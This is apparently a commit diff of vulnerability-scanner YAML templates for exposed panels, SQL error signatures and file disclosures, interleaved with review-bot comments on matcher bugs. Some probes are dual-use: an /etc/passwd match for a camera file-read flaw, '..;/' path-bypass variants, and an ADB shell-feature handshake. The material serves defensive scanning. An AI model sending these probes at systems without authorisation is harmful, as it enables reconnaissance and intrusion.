"com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/poc/elk/elasticsearch-sql-client-detect.yaml b/poc/elk/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/elk/elasticsearch-sql-client-detect.yaml +++ b/poc/elk/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 
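Review bot: Three extractor entries on the new side of 0xelkotsqli.yaml disagree with the matcher list above them, so a hit can be reported without the database engine attached. Under `name: MySQL`, `"SQLSTATE[\\d+]: Syntax error or access violation"` leaves the brackets unescaped, which turns `[\d+]` into a one-character class that cannot match an error of the form `SQLSTATE[42000]` (constructed example); the matcher's `"SQLSTATE\\[\\d+\\]: Syntax error or access violation"` is the form to use. Under `name: FrontBase` the reverse happened: `"(Semantic|Syntax) error \\[1-4\\]\\d{2}\\."` matches a literal `[1-4]`, where the matcher has `"(Semantic|Syntax) error [1-4]\\d{2}\\."`. The extractor for the Drizzle pattern is labelled `name: Drizzel`. As shown on this page, `"\\bSQL Server[^<"]+Driver"` also has a bare `"` inside a double-quoted scalar, which would end the string early; that may be an artefact of how the page was rendered, so it is worth checking in the file itself.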
diff --git a/poc/elk/exposed-kibana.yaml b/poc/elk/exposed-kibana.yaml index a6bd3e4c5d..3acfdaecd4 100644 --- a/poc/elk/exposed-kibana.yaml +++ b/poc/elk/exposed-kibana.yaml @@ -1,18 +1,14 @@ id: exposed-kibana - info: name: Exposed Kibana author: Shine severity: medium - + tags: kibana,unauth requests: - method: GET path: - - '{{BaseURL}}/' - - '{{BaseURL}}:5601/' + - '{{BaseURL}}' - '{{BaseURL}}/app/kibana/' - - '{{BaseURL}}:5601/app/kibana/' - matchers-condition: and matchers: - type: word @@ -23,4 +19,4 @@ requests: - 'kibanaWelcomeTitle' - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/elk/kibana-panel.yaml b/poc/elk/kibana-panel.yaml index 80fdbfbdf9..f2a9dce48c 100644 --- a/poc/elk/kibana-panel.yaml +++ b/poc/elk/kibana-panel.yaml @@ -1,5 +1,4 @@ id: kibana-panel - info: name: Kibana Panel Login author: petruknisme,daffainfo,c-sh0 @@ -7,14 +6,12 @@ info: metadata: shodan-query: http.title:"Kibana" tags: panel,kibana - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/login" - "{{BaseURL}}/app/kibana" - stop-at-first-match: true redirects: true max-redirects: 2 @@ -27,7 +24,6 @@ requests: - "Elastic" - "Kibana Login" condition: or - - type: regex part: header regex: diff --git a/poc/exposed/adobe-connect-username-exposure.yaml b/poc/exposed/adobe-connect-username-exposure.yaml index 088b39ad5e..e47b4fe88b 100644 --- a/poc/exposed/adobe-connect-username-exposure.yaml +++ b/poc/exposed/adobe-connect-username-exposure.yaml 
@@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/exposed/ansible-tower-exposure.yaml b/poc/exposed/ansible-tower-exposure.yaml index 72789c4755..413cf6170f 100644 --- a/poc/exposed/ansible-tower-exposure.yaml +++ b/poc/exposed/ansible-tower-exposure.yaml 
@@ -2,9 +2,21 @@ id: ansible-tower-exposure info: name: Ansible Tower Exposure - author: pdteam + author: pdteam,idealphase severity: low - tags: panel + description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. + reference: + - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ + - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html + metadata: + google-query: intitle:"Ansible Tower" + shodan-query: title:"Ansible Tower" + tags: panel,ansible + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -15,5 +27,14 @@ requests: - type: word words: - "Ansible Tower" - - "ansible-main-menu" - condition: and \ No newline at end of file + - "ansible-bootstrap" + condition: or + + extractors: + - type: regex + group: 1 + part: body + regex: + - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/exposed/appspec-yml-disclosure-529.yaml b/poc/exposed/appspec-yml-disclosure-529.yaml index 0366a46dac..5a8637d8a4 100644 --- a/poc/exposed/appspec-yml-disclosure-529.yaml +++ b/poc/exposed/appspec-yml-disclosure-529.yaml @@ -3,7 +3,8 @@ info: name: Appspec Yml Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json tags: exposure,config requests: - method: GET diff --git a/poc/exposed/beward-ipcamera-disclosure.yaml b/poc/exposed/beward-ipcamera-disclosure.yaml index 726caf87e3..13668d231c 100644 --- a/poc/exposed/beward-ipcamera-disclosure.yaml +++ b/poc/exposed/beward-ipcamera-disclosure.yaml 
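Review bot: In poc/exposed/ansible-tower-exposure.yaml the word matcher now uses `condition: or`, so a response that merely contains the text `Ansible Tower` is reported, and no `part` or status restriction is visible in the hunk. Keeping `condition: and` over both markers, or adding a `- type: status` matcher for `200` under `matchers-condition: and`, would keep documentation pages and search results that mention the product out of the findings. The added `cve-id:` key has no value and parses as null; it is better dropped until there is an id to record. The matchers block starts outside the hunk, so a status check may already exist there.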
@@ -1,11 +1,13 @@ id: beward-ipcamera-disclosure info: name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure - description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php author: geeknik severity: high - tags: beward,iot,camera,disclosure + description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. + reference: + - https://www.exploit-db.com/exploits/46320 + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php + tags: iot,camera,disclosure requests: - method: GET path: @@ -17,7 +19,6 @@ requests: - type: regex regex: - 'root:[x*]:0:0:' - condition: or - type: status status: - 200 diff --git a/poc/exposed/cisco-smi-exposure-970.yaml b/poc/exposed/cisco-smi-exposure-970.yaml index 212bbf0f1b..de1d9fa723 100644 --- a/poc/exposed/cisco-smi-exposure-970.yaml +++ b/poc/exposed/cisco-smi-exposure-970.yaml @@ -24,7 +24,7 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:4786" + - "{{Host}}:4786" matchers: - type: word diff --git a/poc/exposed/clockwork-dashboard-exposure-1012.yaml b/poc/exposed/clockwork-dashboard-exposure-1012.yaml index 3e10886ff7..9a606fda5e 100644 --- a/poc/exposed/clockwork-dashboard-exposure-1012.yaml +++ b/poc/exposed/clockwork-dashboard-exposure-1012.yaml 
@@ -1,30 +1,30 @@ -id: clockwork-dashboard-exposure - -info: - name: Clockwork Dashboard Exposure - author: dhiyaneshDk - severity: high - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json - tags: exposure,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/__clockwork/latest" - - matchers-condition: and - matchers: - - type: word - words: - - '"id":' - - '"version":' - - '"method":' - - '"url":' - - '"time":' - part: body - condition: and - - - type: word - words: - - "application/json" - part: header +id: clockwork-dashboard-exposure + +info: + name: Clockwork Dashboard Exposure + author: dhiyaneshDk + severity: high + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json + tags: exposure,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/__clockwork/latest" + + matchers-condition: and + matchers: + - type: word + words: + - '"id":' + - '"version":' + - '"method":' + - '"url":' + - '"time":' + part: body + condition: and + + - type: word + words: + - "application/json" + part: header diff --git a/poc/exposed/commax-credentials-disclosure-1158.yaml b/poc/exposed/commax-credentials-disclosure-1158.yaml index 0064e4def0..ced35532d2 100644 --- a/poc/exposed/commax-credentials-disclosure-1158.yaml +++ b/poc/exposed/commax-credentials-disclosure-1158.yaml @@ -4,7 +4,8 @@ info: author: gy741 severity: critical description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php tags: commax,exposure,camera,iot requests: - method: GET diff --git a/poc/exposed/comtrend-password-exposure.yaml b/poc/exposed/comtrend-password-exposure.yaml index 50cd590374..71928b694c 100644 
--- a/poc/exposed/comtrend-password-exposure.yaml +++ b/poc/exposed/comtrend-password-exposure.yaml @@ -4,8 +4,7 @@ info: author: geeknik severity: high description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. - reference: - - https://www.exploit-db.com/exploits/16275 + reference: https://www.exploit-db.com/exploits/16275 tags: router,exposure,iot,rce requests: - method: GET diff --git a/poc/exposed/couchdb-exposure-1239.yaml b/poc/exposed/couchdb-exposure-1239.yaml index 83e4c2e185..376f2370b6 100644 --- a/poc/exposed/couchdb-exposure-1239.yaml +++ b/poc/exposed/couchdb-exposure-1239.yaml @@ -3,13 +3,14 @@ info: name: couchdb exposure author: organiccrap severity: low - tags: panel,couchdb + tags: panel requests: - method: GET path: - '{{BaseURL}}/_all_dbs' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/exposed/dockerfile-hidden-disclosure.yaml b/poc/exposed/dockerfile-hidden-disclosure.yaml index feb4a915f9..e62fc2fc5e 100644 --- a/poc/exposed/dockerfile-hidden-disclosure.yaml +++ b/poc/exposed/dockerfile-hidden-disclosure.yaml @@ -3,7 +3,8 @@ info: name: Dockerfile Hidden Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json tags: exposure,config requests: - method: GET diff --git a/poc/exposed/exposed-adb-7280.yaml b/poc/exposed/exposed-adb-7280.yaml index e0a43b6ba2..26f932d53d 100644 --- a/poc/exposed/exposed-adb-7280.yaml +++ b/poc/exposed/exposed-adb-7280.yaml 
@@ -1,22 +1,33 @@ id: expsoed-adb + info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu severity: critical + description: An exposed Android debug bridge was discovered. + reference: + - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 + - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ tags: network,adb,rce,android - reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + network: - inputs: - - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint + - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint type: hex + - data: "686f73743a3a66656174757265733d7368656c6c5f76322c636d642c737461745f76322c6c735f76322c66697865645f707573685f6d6b6469722c617065782c6162622c66697865645f707573685f73796d6c696e6b5f74696d657374616d702c6162625f657865632c72656d6f756e745f7368656c6c2c747261636b5f6170702c73656e64726563765f76322c73656e64726563765f76325f62726f746c692c73656e64726563765f76325f6c7a342c73656e64726563765f76325f7a7374642c73656e64726563765f76325f6472795f72756e5f73656e642c6f70656e73637265656e5f6d646e73" type: hex + host: - "{{Hostname}}" - "{{Host}}:5555" + matchers: - type: word words: - "device" - "product" condition: and + +# Enhanced by mp on 2022/03/21 diff --git a/poc/exposed/exposed-alps-spring-7284.yaml b/poc/exposed/exposed-alps-spring-7284.yaml index abbac6f138..5391725778 100644 --- a/poc/exposed/exposed-alps-spring-7284.yaml +++ b/poc/exposed/exposed-alps-spring-7284.yaml 
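Review bot: The template id on the first context line of poc/exposed/exposed-adb-7280.yaml is still spelled `expsoed-adb`, so selecting or excluding this template by the expected id misses it; since the hunk already rewrites the header, `id: exposed-adb` belongs in the same change. The second `data:` payload added under `inputs` has no comment, unlike the first one. Decoded, it begins with `host::features=shell_v2,cmd,...`, so a line such as `# ADB connection feature list (host::features=...)` above it would let a reviewer confirm what is sent without decoding the hex.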
@@ -1,23 +1,16 @@ id: exposed-alps-spring - info: name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) author: dwisiswant0 severity: medium - description: Exposed Spring Data profile semantics is exposed. - reference: - - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ - metadata: - max-request: 3 - tags: exposure,spring,files - -http: + tags: exposure + reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ +requests: - method: GET path: - "{{BaseURL}}/profile" - "{{BaseURL}}/api/profile" - "{{BaseURL}}/alps/profile" - matchers-condition: and matchers: - type: word @@ -27,13 +20,10 @@ http: - "profile" condition: and part: body - - type: word words: - "application/hal+json" part: header - - type: status status: - 200 -# digest: 490a0046304402200703b103b73e6c9bfffc56b77551a83932ef1f4e983b9075e82b4a2128ffff800220240eb935da994b34aa984e070bd64175bee530216e73e19f9af3add0ee595d5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/exposed-kibana.yaml b/poc/exposed/exposed-kibana.yaml index a6bd3e4c5d..3acfdaecd4 100644 --- a/poc/exposed/exposed-kibana.yaml +++ b/poc/exposed/exposed-kibana.yaml @@ -1,18 +1,14 @@ id: exposed-kibana - info: name: Exposed Kibana author: Shine severity: medium - + tags: kibana,unauth requests: - method: GET path: - - '{{BaseURL}}/' - - '{{BaseURL}}:5601/' + - '{{BaseURL}}' - '{{BaseURL}}/app/kibana/' - - '{{BaseURL}}:5601/app/kibana/' - matchers-condition: and matchers: - type: word @@ -23,4 +19,4 @@ requests: - 'kibanaWelcomeTitle' - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/exposed/exposed-nomad-7327.yaml b/poc/exposed/exposed-nomad-7327.yaml index db9e2d8a15..bd1a5a7f1c 100644 --- a/poc/exposed/exposed-nomad-7327.yaml +++ b/poc/exposed/exposed-nomad-7327.yaml 
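Review bot: Replacing `http:` with the older `requests:` key and deleting the trailing `# digest:` line in poc/exposed/exposed-alps-spring-7284.yaml leaves the template in the legacy layout and without its signature, which looks like an accidental restore of an earlier copy rather than an update. The same pattern appears in poc/exposed/putty-private-key-disclosure-9730.yaml, which also drops seven of its eight paths, and in poc/ftp/ftpconfig-7566.yaml. The `description`, the `metadata` block and the `spring,files` tags are lost as well, so tag-based runs for `spring` no longer include this check. If the downgrade is intended it should be stated in the commit message; otherwise keep `http:`, the digest line and the removed info fields.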
@@ -1,33 +1,38 @@ -id: exposed-nomad -info: - name: Nomad - Exposed Jobs - author: pdteam - severity: medium - description: Nomad jobs were discovered. - reference: - - https://www.nomadproject.io/docs/internals/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: nomad,devops,hashicorp,panel -requests: - - method: GET - path: - - "{{BaseURL}}/ui/jobs" - matchers-condition: and - matchers: - - type: word - words: - - "Nomad" - - "nomad-ui" - condition: and - - type: word - words: - - "text/html" - part: header - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 +id: exposed-nomad + +info: + name: Nomad - Exposed Jobs + author: pdteam + severity: medium + description: Nomad jobs were discovered. + reference: + - https://www.nomadproject.io/docs/internals/security + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + tags: nomad,devops,hashicorp,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/ui/jobs" + + matchers-condition: and + matchers: + - type: word + words: + - "Nomad" + - "nomad-ui" + condition: and + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/exposed/exposed-redis-7337.yaml b/poc/exposed/exposed-redis-7337.yaml index 166260adf7..825d612ae0 100644 --- a/poc/exposed/exposed-redis-7337.yaml +++ b/poc/exposed/exposed-redis-7337.yaml @@ -4,13 +4,13 @@ info: author: pdteam severity: high reference: https://redis.io/topics/security - tags: network,redis,unauth + tags: network,redis network: - inputs: - data: "info\r\nquit\r\n" host: - "{{Hostname}}" - - "{{Host}}:6379" + - "{{Hostname}}:6379" read-size: 2048 matchers-condition: and matchers: diff --git a/poc/exposed/exposed-sqlite-manager-7350.yaml b/poc/exposed/exposed-sqlite-manager-7350.yaml index a76ba9d93d..cff80e3ad5 100644 
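Review bot: The second host entry in poc/exposed/exposed-redis-7337.yaml changes from `{{Host}}:6379` to `{{Hostname}}:6379`, and `{{Hostname}}` already carries the port when the input has one, so a target given as host:port expands to an address with two ports and the probe on 6379 is not sent. `- "{{Host}}:6379"` should stay; poc/exposed/cisco-smi-exposure-970.yaml makes exactly that correction in this same commit (`{{Hostname}}:4786` to `{{Host}}:4786`). Removing the `unauth` tag also takes the template out of tag-based runs that look for unauthenticated services. The network block continues outside the hunk.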
--- a/poc/exposed/exposed-sqlite-manager-7350.yaml +++ b/poc/exposed/exposed-sqlite-manager-7350.yaml @@ -1,18 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/exposed/exposed-svn-7352.yaml b/poc/exposed/exposed-svn-7352.yaml index a3c7354eac..9e8aed327a 100644 --- a/poc/exposed/exposed-svn-7352.yaml +++ b/poc/exposed/exposed-svn-7352.yaml @@ -1,23 +1,28 @@ id: exposed-svn + info: name: Exposed SVN Directory - author: udit_thakkur & dwisiswant0 + author: udit_thakkur,dwisiswant0 severity: medium tags: config,exposure,svn + requests: - method: GET path: - "{{BaseURL}}/.svn/entries" + matchers-condition: and matchers: - type: regex part: body regex: - "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))" + - type: status status: - 200 + - type: word part: header words: - - "text/plain" + - "text/plain" \ No newline at end of file diff --git a/poc/exposed/exposed-swagger.yaml b/poc/exposed/exposed-swagger.yaml index 4700911c23..9ba88813fb 100644 --- a/poc/exposed/exposed-swagger.yaml +++ b/poc/exposed/exposed-swagger.yaml 
@@ -13,73 +13,19 @@ info: requests: - method: GET path: - - "{{BaseURL}}/swagger/" - - "{{BaseURL}}/swagger/index.html" - - "{{BaseURL}}/swagger-ui/index.html" - - "{{BaseURL}}/swagger-ui.html" - - "{{BaseURL}}/api/" - - "{{BaseURL}}/api/docs" - - "{{BaseURL}}/api-doc" - - "{{BaseURL}}/api-docs" - - "{{BaseURL}}/docs/index.html" - - "{{BaseURL}}/docs/" - - "{{BaseURL}}/docs/swagger-ui.html" - - "{{BaseURL}}/api/swagger-ui.html" - - "{{BaseURL}}/swagger/ui/index.html" - - "{{BaseURL}}/swagger/ui/index" - - "{{BaseURL}}/api/swagger/index.html" - - "{{BaseURL}}/api/swagger/ui/index" - - "{{BaseURL}}/api/swagger-ui/index.html" - - "{{BaseURL}}/api/docs/index.html" - - "{{BaseURL}}/api/doc/index.html" - - "{{BaseURL}}/api/index.html" - - "{{BaseURL}}/api/v1/swagger/index.html" - - "{{BaseURL}}/api/v1/swagger-ui/index.html" - - "{{BaseURL}}/api/v1/swagger/ui/index" - - "{{BaseURL}}/api/v1/docs/index.html" - - "{{BaseURL}}/api/v1/docs/swagger-ui/index.html" - - "{{BaseURL}}/api/v1/docs/swagger/index.html" - - "{{BaseURL}}/api/v2/swagger/index.html" - - "{{BaseURL}}/api/v2/docs/swagger-ui/index.html" - - "{{BaseURL}}/api/v2/docs/swagger/index.html" - - "{{BaseURL}}/api/v2/swagger-ui/index.html" - - "{{BaseURL}}/api/v2/swagger/ui/index" - - "{{BaseURL}}/api/v2/docs/index.html" - - "{{BaseURL}}/api/v3/swagger/index.html" - - "{{BaseURL}}/api/v3/swagger-ui/index.html" - - "{{BaseURL}}/api/v3/docs/swagger-ui/index.html" - - "{{BaseURL}}/api/v3/docs/swagger/index.html" - - "{{BaseURL}}/api/v3/swagger/ui/index" - - "{{BaseURL}}/api/v3/docs/index.html" - - "{{BaseURL}}/docs/swagger-ui/index.html" - - "{{BaseURL}}/v1/swagger/index.html" - - "{{BaseURL}}/v1/api" - - "{{BaseURL}}/v1/swagger-ui/index.html" - - "{{BaseURL}}/v1/swagger/ui/index" - - "{{BaseURL}}/v1/docs/index.html" - - "{{BaseURL}}/v1/api-docs/index.html" - - "{{BaseURL}}/v2/swagger/index.html" - - "{{BaseURL}}/v2/api" - - "{{BaseURL}}/v2/api-docs/index.html" - - "{{BaseURL}}/v2/swagger-ui/index.html" - - 
"{{BaseURL}}/v2/swagger/ui/index" - - "{{BaseURL}}/v2/docs/index.html" - - "{{BaseURL}}/v3/swagger/index.html" - - "{{BaseURL}}/v3/api-docs/index.html" - - "{{BaseURL}}/v3/swagger-ui/index.html" - - "{{BaseURL}}/v3/api" - - "{{BaseURL}}/v3/swagger/ui/index" - - "{{BaseURL}}/v3/docs/index.html" - - "{{BaseURL}}/" - - "{{BaseURL}}/doc/" - - "{{BaseURL}}/v0/" - - "{{BaseURL}}/v1/" - - "{{BaseURL}}/v2/" - - "{{BaseURL}}/v3/" - - "{{BaseURL}}/api/schema/swagger-ui/" - + - "{{BaseURL}}/swagger/..;/swagger/index.html" + - "{{BaseURL}}/swagger-ui/..;/swagger-ui/index.html" + - "{{BaseURL}}/api/..;/api/" + - "{{BaseURL}}/api/..;/api/docs/" + - "{{BaseURL}}/api-doc/..;/api-doc" + - "{{BaseURL}}/api-docs/..;/api-docs" + - "{{BaseURL}}/docs/..;/docs/index.html" + - "{{BaseURL}}/api/..;/api/swagger-ui.html" + - "{{BaseURL}}/swagger/..;/swagger/ui/index" + - "{{BaseURL}}/api/..;/api/swagger/index.html" + - "{{BaseURL}}/v1/..;/v1/" matchers: - type: word words: - - "Swagger UI" + - "swagger-ui-" diff --git a/poc/exposed/ftp-credentials-exposure.yaml b/poc/exposed/ftp-credentials-exposure.yaml index a0650c5bb3..2144e34389 100644 --- a/poc/exposed/ftp-credentials-exposure.yaml +++ b/poc/exposed/ftp-credentials-exposure.yaml @@ -1,13 +1,16 @@ id: ftp-credentials-exposure + info: name: FTP credentials exposure author: pikpikcu severity: medium tags: config,ftp,exposure + requests: - method: GET path: - "{{BaseURL}}/ftpsync.settings" + matchers-condition: and matchers: - type: word @@ -17,6 +20,7 @@ requests: - default_folder_permissions part: body condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/exposed/gogs-install-exposure.yaml b/poc/exposed/gogs-install-exposure.yaml index a41ff33671..bf05d82b66 100644 --- a/poc/exposed/gogs-install-exposure.yaml +++ b/poc/exposed/gogs-install-exposure.yaml 
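Review bot: Every direct path in poc/exposed/exposed-swagger.yaml is removed and only the `..;/` path-normalisation variants remain, so a Swagger UI that is simply reachable at `/swagger-ui.html` or `/api-docs` is no longer reported; for an exposure inventory the plain paths should stay alongside the new ones. The single matcher word `"swagger-ui-"` has no `part` or status condition, so I would pair it with a `- type: status` matcher for `200` under `matchers-condition: and`. With a path list of this size, `stop-at-first-match: true` would also cut the number of requests sent per target. The info block lies outside the hunk.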
@@ -1,6 +1,6 @@ id: gogs-install-exposure info: - name: Gogs install exposure + name: Gogs (Go Git Service) - Install Exposure author: dhiyaneshDk severity: high tags: gogs,exposure diff --git a/poc/exposed/iceflow-vpn-disclosure.yaml b/poc/exposed/iceflow-vpn-disclosure.yaml index eb974cd7f4..28d2389e90 100644 --- a/poc/exposed/iceflow-vpn-disclosure.yaml +++ b/poc/exposed/iceflow-vpn-disclosure.yaml @@ -3,8 +3,8 @@ id: iceflow-vpn-disclosure info: name: ICEFlow VPN Disclosure author: pikpikcu - severity: medium - tags: exposure,files + severity: low + tags: exposure,files,iceflow,logs requests: - method: GET @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/log/mobile.log" - "{{BaseURL}}/log/firewall.log" + max-size: 2048 matchers-condition: and matchers: - type: word @@ -26,7 +27,15 @@ requests: - 'ICEFLOW SYSTEM' - 'ICEFLOW' part: body + condition: or - type: status status: - 200 + + - type: word + words: + - "text/plain" + - "ICEFLOW" + part: header + condition: and diff --git a/poc/exposed/iis-internal-ip-disclosure.yaml b/poc/exposed/iis-internal-ip-disclosure.yaml index 22f69af785..100c18eaf3 100644 --- a/poc/exposed/iis-internal-ip-disclosure.yaml +++ b/poc/exposed/iis-internal-ip-disclosure.yaml 
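Review bot: The header matcher added at the end of poc/exposed/iceflow-vpn-disclosure.yaml requires both `text/plain` and `ICEFLOW` in the response headers with `condition: and`; the body matcher suggests `ICEFLOW` is log content, so unless the server also emits that string in a header the template can no longer match under `matchers-condition: and`. Limiting the header words to `- "text/plain"` keeps the content-type check without that dependency. The new `condition: or` on the body words makes the bare word `ICEFLOW` sufficient on its own, which is acceptable only together with the content-type and status checks.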
@@ -1,36 +1,33 @@ id: iis-internal-ip-disclosure + info: name: IIS Internal IP Disclosure Template author: WillD96 severity: info - reference: - - https://support.kemptechnologies.com/hc/en-us/articles/203522429-How-to-Mitigate-Against-Internal-IP-Address-Domain-Name-Disclosure-In-Real-Server-Redirect tags: iis,misconfig,disclosure + reference: https://support.kemptechnologies.com/hc/en-us/articles/203522429-How-to-Mitigate-Against-Internal-IP-Address-Domain-Name-Disclosure-In-Real-Server-Redirect + requests: - raw: - - |+ - GET / HTTP/1.0 - Accept: */* - - |+ GET / HTTP/1.0 Host: Accept: */* - stop-at-first-match: true unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. matchers-condition: and matchers: - type: regex - part: location + part: header regex: - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - type: status status: - - 301 - 302 + extractors: - type: regex - part: location + part: header regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' \ No newline at end of file diff --git a/poc/exposed/kyan-network-credentials-disclosure.yaml b/poc/exposed/kyan-network-credentials-disclosure.yaml index c44c1fd9d0..3cdc3b982d 100644 --- a/poc/exposed/kyan-network-credentials-disclosure.yaml +++ b/poc/exposed/kyan-network-credentials-disclosure.yaml @@ -1,5 +1,4 @@ id: kyan-network-credential-exposure - info: name: Kyan network monitoring device account and password exposure author: pikpikcu @@ -7,26 +6,21 @@ info: reference: | - https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg tags: kyan,exposure,config - requests: - method: GET path: - "{{BaseURL}}/hosts" - 